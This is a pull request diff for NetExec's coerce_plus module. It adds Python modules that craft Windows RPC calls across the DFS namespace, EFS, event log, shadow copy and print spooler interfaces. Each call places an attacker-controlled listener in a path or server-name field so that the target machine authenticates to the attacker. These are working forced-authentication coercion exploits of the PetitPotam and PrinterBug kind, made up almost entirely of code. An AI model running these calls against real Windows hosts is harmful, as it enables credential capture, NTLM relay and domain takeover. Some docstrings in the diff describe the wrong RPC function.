### PR TITLE
[coerce_plus] Make coerce plus module more flexible 

### DIFF
--- a/nxc/modules/coerce_plus_method/DCERPCSessionError.py
+++ b/nxc/modules/coerce_plus_method/DCERPCSessionError.py
@@ -1,0 +1,22 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# File name          : DCERPCSessionError.py
+# Author             : Podalirius (@podalirius_)
+# Date created       : 15 Sep 2022
+
+from impacket import system_errors
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__(self):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+            return 'SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'SessionError: unknown error code: 0x%x' % self.error_code

--- a/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsAddRootTarget.py
+++ b/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsAddRootTarget.py
@@ -1,0 +1,40 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, BOOL, NULL
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+class NetrDfsAddRootTarget(NDRCALL):
+    """
+    NET_API_STATUS NetrDfsAddRootTarget(
+        [in, unique, string] LPWSTR pDfsPath,
+        [in, unique, string] LPWSTR pTargetPath,
+        [in] ULONG MajorVersion,
+        [in, unique, string] LPWSTR pComment,
+        [in] BOOLEAN NewNamespace,
+        [in] ULONG Flags
+    );
+    """
+    opnum = 23
+    structure = (
+        ("pDfsPath", LPWSTR),  # Type: LPWSTR
+        ("pTargetPath", LPWSTR),  # Type: LPWSTR
+        ("MajorVersion", ULONG),  # Type: ULONG
+        ("pComment", LPWSTR),  # Type: LPWSTR
+        ("NewNamespace", BOOL),  # Type: BOOLEAN
+        ("Flags", ULONG),  # Type: ULONG
+    )
+
+
+class NetrDfsAddRootTargetResponse(NDRCALL):
+    structure = ()
+
+
+def request(dce, listener):
+    request = NetrDfsAddRootTarget()
+    request["pDfsPath"] = f"\\\\{listener}\\a\x00"
+    request["pTargetPath"] = NULL
+    request["MajorVersion"] = 0
+    request["pComment"] = "lodos\x00"
+    request["NewNamespace"] = 0
+    request["Flags"] = 0
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsAddStdRoot.py
+++ b/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsAddStdRoot.py
@@ -1,0 +1,28 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+class NetrDfsAddStdRoot(NDRCALL):
+    """Structure to make the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol"""
+    opnum = 12
+    structure = (
+        ("ServerName", WSTR),  # Type: WCHAR *
+        ("RootShare", WSTR),   # Type: WCHAR *
+        ("Comment", WSTR),     # Type: WCHAR *
+        ("ApiFlags", DWORD),   # Type: DWORD
+    )
+
+
+class NetrDfsAddStdRootResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = NetrDfsAddStdRoot()
+    request["ServerName"] = f"{listener}\x00"
+    request["RootShare"] = "test\x00"
+    request["Comment"] = "lodos\x00"
+    request["ApiFlags"] = 0
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsAddStdRootForced.py
+++ b/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsAddStdRootForced.py
@@ -1,0 +1,34 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+class NetrDfsAddStdRootForced(NDRCALL):
+    """
+    NET_API_STATUS NetrDfsAddStdRootForced(
+        [in, string] WCHAR* ServerName,
+        [in, string] WCHAR* RootShare,
+        [in, string] WCHAR* Comment,
+        [in, string] WCHAR* Share
+    );
+    """
+    opnum = 15
+    structure = (
+        ("ServerName", WSTR),  # Type: WCHAR *
+        ("RootShare", WSTR),  # Type: WCHAR *
+        ("Comment", WSTR),  # Type: WCHAR *
+        ("Share", WSTR),  # Type: WCHAR *
+    )
+
+
+class NetrDfsAddStdRootForcedResponse(NDRCALL):
+    structure = ()
+
+
+def request(dce, listener):
+    request = NetrDfsAddStdRootForced()
+    request["ServerName"] = f"{listener}\x00"
+    request["RootShare"] = "test\x00"
+    request["Comment"] = "lodos\x00"
+    request["Share"] = "x:\\lodos2005\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsManagerInitialize.py
+++ b/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsManagerInitialize.py
@@ -1,0 +1,28 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+class NetrDfsManagerInitialize(NDRCALL):
+    """
+    NET_API_STATUS NetrDfsManagerInitialize(
+        [in, string] WCHAR* ServerName,
+        [in] DWORD Flags
+    );
+    """
+    opnum = 14
+    structure = (
+        ("ServerName", WSTR),  # Type: WCHAR *
+        ("Flags", DWORD),  # Type: DWORD
+    )
+
+
+class NetrDfsManagerInitializeResponse(NDRCALL):
+    structure = ()
+
+
+def request(dce, listener):
+    request = NetrDfsManagerInitialize()
+    request["ServerName"] = f"{listener}\x00"
+    request["Flags"] = 0  # Flags: This parameter MUST be zero.
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsRemoveRootTarget.py
+++ b/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsRemoveRootTarget.py
@@ -1,0 +1,32 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, NULL
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class NetrDfsRemoveRootTarget(NDRCALL):
+    """
+    NET_API_STATUS NetrDfsRemoveRootTarget(
+        [in, unique, string] LPWSTR pDfsPath,
+        [in, unique, string] LPWSTR pTargetPath,
+        [in] ULONG Flags
+    );
+    """
+    opnum = 24
+    structure = (
+        ("pDfsPath", LPWSTR),  # Type: LPWSTR
+        ("pTargetPath", LPWSTR),  # Type: LPWSTR
+        ("Flags", ULONG),  # Type: ULONG
+    )
+
+
+class NetrDfsRemoveRootTargetResponse(NDRCALL):
+    structure = ()
+
+
+def request(dce, listener):
+    request = NetrDfsRemoveRootTarget()
+    request["pDfsPath"] = f"\\\\{listener}\\a\x00"
+    request["pTargetPath"] = NULL
+    request["Flags"] = 0
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsRemoveStdRoot.py
+++ b/nxc/modules/coerce_plus_method/MS_DFSNM/NetrDfsRemoveStdRoot.py
@@ -1,0 +1,27 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class NetrDfsRemoveStdRoot(NDRCALL):
+    """Structure to make the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol"""
+    opnum = 13
+    structure = (
+        ("ServerName", WSTR),  # Type: WCHAR *
+        ("RootShare", WSTR),   # Type: WCHAR *
+        ("ApiFlags", DWORD)    # Type: DWORD
+    )
+
+
+class NetrDfsRemoveStdRootResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = NetrDfsRemoveStdRoot()
+    request["ServerName"] = f"{listener}\x00"
+    request["RootShare"] = "test\x00"
+    request["ApiFlags"] = 0
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcAddUsersToFile.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcAddUsersToFile.py
@@ -1,0 +1,25 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+from nxc.modules.coerce_plus_method.MS_EFSR.dtypes import ENCRYPTION_CERTIFICATE_LIST
+
+
+class EfsRpcAddUsersToFile(NDRCALL):
+    """Structure to make the RPC call to EfsRpcAddUsersToFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)"""
+    opnum = 9
+    structure = (
+        ("FileName", WSTR),   # Type: wchar_t *
+        ("EncryptionCertificates", ENCRYPTION_CERTIFICATE_LIST)
+    )
+
+
+class EfsRpcAddUsersToFileResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcAddUsersToFile()
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcAddUsersToFileEx.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcAddUsersToFileEx.py
@@ -1,0 +1,28 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD, NDRPOINTERNULL
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+from nxc.modules.coerce_plus_method.MS_EFSR.dtypes import ENCRYPTION_CERTIFICATE_LIST
+
+
+class EfsRpcAddUsersToFileEx(NDRCALL):
+    opnum = 15
+    structure = (
+        ("dwFlags", DWORD),    # Type: DWORD
+        # Accroding to this page: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
+        # Reserved must be set to NULL
+        ("Reserved", NDRPOINTERNULL),   # Type: NDRPOINTERNULL *
+        ("FileName", WSTR),    # Type: wchar_t *
+        ("EncryptionCertificates", ENCRYPTION_CERTIFICATE_LIST),  # Type: ENCRYPTION_CERTIFICATE_LIST *
+    )
+
+
+class EfsRpcAddUsersToFileExResponse(NDRCALL):
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcAddUsersToFileEx()
+    request["dwFlags"] = 0x00000002
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcDecryptFileSrv.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcDecryptFileSrv.py
@@ -1,0 +1,25 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, ULONG
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class EfsRpcDecryptFileSrv(NDRCALL):
+    """Structure to make the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    opnum = 5
+    structure = (
+        ("FileName", WSTR),   # Type: wchar_t *
+        ("OpenFlag", ULONG),  # Type: unsigned
+    )
+
+
+class EfsRpcDecryptFileSrvResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcDecryptFileSrv()
+    request["OpenFlag"] = 0
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
@@ -1,0 +1,34 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD, BOOL
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+from nxc.modules.coerce_plus_method.MS_EFSR.dtypes import EFS_RPC_BLOB
+
+
+class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
+    """Structure to make the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    opnum = 13
+    structure = (
+        ("SrcFileName", WSTR),  # Type: wchar_t *
+        ("DestFileName", WSTR),  # Type: wchar_t *
+        ("dwCreationDisposition", DWORD),  # Type: DWORD
+        ("dwAttributes", DWORD),  # Type: DWORD
+        ("RelativeSD", EFS_RPC_BLOB),  # Type: EFS_RPC_BLOB *
+        ("bInheritHandle", BOOL),  # Type: BOOL
+    )
+
+
+class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcDuplicateEncryptionInfoFile()
+    request["SrcFileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    request["DestFileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    request["dwCreationDisposition"] = 0
+    request["dwAttributes"] = 0
+    request["RelativeSD"] = EFS_RPC_BLOB()
+    request["bInheritHandle"] = 0
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcEncryptFileSrv.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcEncryptFileSrv.py
@@ -1,0 +1,23 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class EfsRpcEncryptFileSrv(NDRCALL):
+    """Structure to make the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    opnum = 4
+    structure = (
+        ("FileName", WSTR),  # Type: wchar_t *
+    )
+
+
+class EfsRpcEncryptFileSrvResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcEncryptFileSrv()
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcFileKeyInfo.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcFileKeyInfo.py
@@ -1,0 +1,25 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class EfsRpcFileKeyInfo(NDRCALL):
+    """Structure to make the RPC call to EfsRpcFileKeyInfo() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    opnum = 12
+    structure = (
+        ("FileName", WSTR),   # Type: wchar_t *
+        ("InfoClass", DWORD)  # Type: DWORD
+    )
+
+
+class EfsRpcFileKeyInfoResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcFileKeyInfo() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcFileKeyInfo()
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    request["InfoClass"] = 0
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcOpenFileRaw.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcOpenFileRaw.py
@@ -1,0 +1,25 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR, LONG
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class EfsRpcOpenFileRaw(NDRCALL):
+    """Structure to make the RPC call to EfsRpcOpenFileRaw() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    opnum = 0
+    structure = (
+        ("FileName", WSTR),  # Type: wchar_t *
+        ("Flags", LONG),     # Type: long
+    )
+
+
+class EfsRpcOpenFileRawResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcOpenFileRaw() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcOpenFileRaw()
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    request["Flags"] = 0
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcQueryRecoveryAgents.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcQueryRecoveryAgents.py
@@ -1,0 +1,23 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class EfsRpcQueryRecoveryAgents(NDRCALL):
+    """Structure to make the RPC call to EfsRpcQueryRecoveryAgents() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    opnum = 7
+    structure = (
+        ("FileName", WSTR),  # Type: wchar_t *
+    )
+
+
+class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcQueryRecoveryAgents() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcQueryRecoveryAgents()
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcQueryUsersOnFile.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcQueryUsersOnFile.py
@@ -1,0 +1,23 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class EfsRpcQueryUsersOnFile(NDRCALL):
+    """Structure to make the RPC call to EfsRpcQueryUsersOnFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    opnum = 6
+    structure = (
+        ("FileName", WSTR),  # Type: wchar_t *
+    )
+
+
+class EfsRpcQueryUsersOnFileResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcQueryUsersOnFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcQueryUsersOnFile()
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcRemoveUsersFromFile.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/EfsRpcRemoveUsersFromFile.py
@@ -1,0 +1,25 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+from nxc.modules.coerce_plus_method.MS_EFSR.dtypes import ENCRYPTION_CERTIFICATE_HASH_LIST
+
+
+class EfsRpcRemoveUsersFromFile(NDRCALL):
+    """Structure to make the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/28609dad-5fa5-4af9-9382-18d40e3e9dec)"""
+    opnum = 8
+    structure = (
+        ("FileName", WSTR),
+        ("Users", ENCRYPTION_CERTIFICATE_HASH_LIST)
+    )
+
+
+class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = EfsRpcRemoveUsersFromFile()
+    request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_EFSR/dtypes.py
+++ b/nxc/modules/coerce_plus_method/MS_EFSR/dtypes.py
@@ -1,0 +1,40 @@
+from impacket.dcerpc.v5.ndr import NDRSTRUCT
+from impacket.dcerpc.v5.dtypes import DWORD, PCHAR, RPC_SID, LPWSTR
+
+
+class EFS_HASH_BLOB(NDRSTRUCT):
+    structure = (
+        ("Data", DWORD),
+        ("cbData", PCHAR),
+    )
+
+
+class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
+    structure = (
+        ("Lenght", DWORD),
+        ("SID", RPC_SID),
+        ("Hash", EFS_HASH_BLOB),
+        ("Display", LPWSTR),
+    )
+
+
+class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
+    structure = (
+        ("nUsers", DWORD),
+        ("Users", ENCRYPTION_CERTIFICATE_HASH),
+    )
+
+
+class EFS_RPC_BLOB(NDRSTRUCT):
+    structure = (
+        ("Data", DWORD),
+        ("cbData", PCHAR),
+    )
+
+
+class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
+    align = 1
+    structure = (
+        ("Cert", DWORD),
+        ("Users", ENCRYPTION_CERTIFICATE_HASH),
+    )

--- a/nxc/modules/coerce_plus_method/MS_EVEN/ElfrOpenBELW.py
+++ b/nxc/modules/coerce_plus_method/MS_EVEN/ElfrOpenBELW.py
@@ -1,0 +1,13 @@
+from impacket.dcerpc.v5.even import ElfrOpenBELW
+from impacket.dcerpc.v5.dtypes import NULL
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+def request(dce, listener):
+    request = ElfrOpenBELW()
+    request["UNCServerName"] = NULL  # '%s\x00' % listener
+    request["BackupFileName"] = f"\\??\\UNC\\{listener}\\abcdefgh\\aa"
+    request["MajorVersion"] = 1
+    request["MinorVersion"] = 1
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_FSRVP/IsPathShadowCopied.py
+++ b/nxc/modules/coerce_plus_method/MS_FSRVP/IsPathShadowCopied.py
@@ -1,0 +1,23 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class IsPathShadowCopied(NDRCALL):
+    """Structure to make the RPC call to IsPathShadowCopied() in MS-FSRVP Protocol"""
+    opnum = 9
+    structure = (
+        ("ShareName", WSTR),  # Type: LPWSTR
+    )
+
+
+class IsPathShadowCopiedResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to IsPathShadowCopied() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = IsPathShadowCopied()
+    request["ShareName"] = f"{listener}\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_FSRVP/IsPathSupported.py
+++ b/nxc/modules/coerce_plus_method/MS_FSRVP/IsPathSupported.py
@@ -1,0 +1,23 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.dtypes import WSTR
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class IsPathSupported(NDRCALL):
+    """Structure to make the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)"""
+    opnum = 8
+    structure = (
+        ("ShareName", WSTR),  # Type: LPWSTR
+    )
+
+
+class IsPathSupportedResponse(NDRCALL):
+    """Structure to parse the response of the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)"""
+    structure = ()
+
+
+def request(dce, listener):
+    request = IsPathSupported()
+    request["ShareName"] = f"{listener}\x00"
+    dce.request(request)

--- a/nxc/modules/coerce_plus_method/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
+++ b/nxc/modules/coerce_plus_method/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
@@ -1,0 +1,52 @@
+from impacket.dcerpc.v5.ndr import NDRCALL
+from impacket.dcerpc.v5.rprn import PRINTER_HANDLE, PRINTER_CHANGE_ADD_JOB, hRpcOpenPrinter
+from impacket.dcerpc.v5.dtypes import LPWSTR, DWORD, LPBYTE, NULL
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+class RpcRemoteFindFirstPrinterChangeNotification(NDRCALL):
+    opnum = 62
+    structure = (
+        ("hPrinter", PRINTER_HANDLE),
+        ("fdwFlags", DWORD),
+        ("fdwOptions", DWORD),
+        ("pszLocalMachine", LPWSTR),
+        ("dwPrinterLocal", DWORD),
+        ("cbBuffer", DWORD),
+        ("pBuffer", LPBYTE),
+    )
+
+
+class RpcRemoteFindFirstPrinterChangeNotificationResponse(NDRCALL):
+    structure = ()
+
+
+def request(dce, listener, target):
+    resp = hRpcOpenPrinter(dce, f"\\\\{target}\x00")
+
+    # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d
+    request = RpcRemoteFindFirstPrinterChangeNotification()
+    request["hPrinter"] = resp["pHandle"]
+    request["fdwFlags"] = PRINTER_CHANGE_ADD_JOB
+    request["pszLocalMachine"] = f"\\\\{listener}\x00"
+    request["fdwOptions"] = 0x00000000
+    request["dwPrinterLocal"] = 0
+    request["cbBuffer"] = NULL
+    request["pBuffer"] = NULL
+    dce.request(request)
+
+"""
+
+try:
+    resp = rprn.hRpcOpenPrinter(dce, f"\\\\{target}\x00")
+except Exception as e:
+    if str(e).find("Broken pipe") >= 0:
+        # The connection timed-out. Let's try to bring it back next round
+        self.context.log.debug("Connection failed - skipping host!")
+        return None
+    elif str(e).upper().find("ACCESS_DENIED"):
+        # We're not admin, bye
+        self.context.log.debug("Access denied - RPC call was denied")
+        return None
+"""

--- a/nxc/modules/coerce_plus_method/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
+++ b/nxc/modules/coerce_plus_method/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
@@ -1,0 +1,31 @@
+from impacket.dcerpc.v5.rprn import PRINTER_CHANGE_ADD_JOB, RpcRemoteFindFirstPrinterChangeNotificationEx, hRpcOpenPrinter
+
+from nxc.modules.coerce_plus_method.DCERPCSessionError import DCERPCSessionError
+
+
+def request(dce, listener, target):
+    resp = hRpcOpenPrinter(dce, f"\\\\{target}\x00")
+
+    # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d
+    request = RpcRemoteFindFirstPrinterChangeNotificationEx()
+    request["hPrinter"] = resp["pHandle"]
+    request["fdwFlags"] = PRINTER_CHANGE_ADD_JOB
+    request["pszLocalMachine"] = f"\\\\{listener}\x00"
+    request["fdwOptions"] = 0x00000000
+    request["dwPrinterLocal"] = 0
+    dce.request(request)
+
+"""
+
+try:
+    resp = rprn.hRpcOpenPrinter(dce, f"\\\\{target}\x00")
+except Exception as e:
+    if str(e).find("Broken pipe") >= 0:
+        # The connection timed-out. Let's try to bring it back next round
+        self.context.log.debug("Connection failed - skipping host!")
+        return None
+    elif str(e).upper().find("ACCESS_DENIED"):
+        # We're not admin, bye
+        self.context.log.debug("Access denied - RPC call was denied")
+        return None
+"""


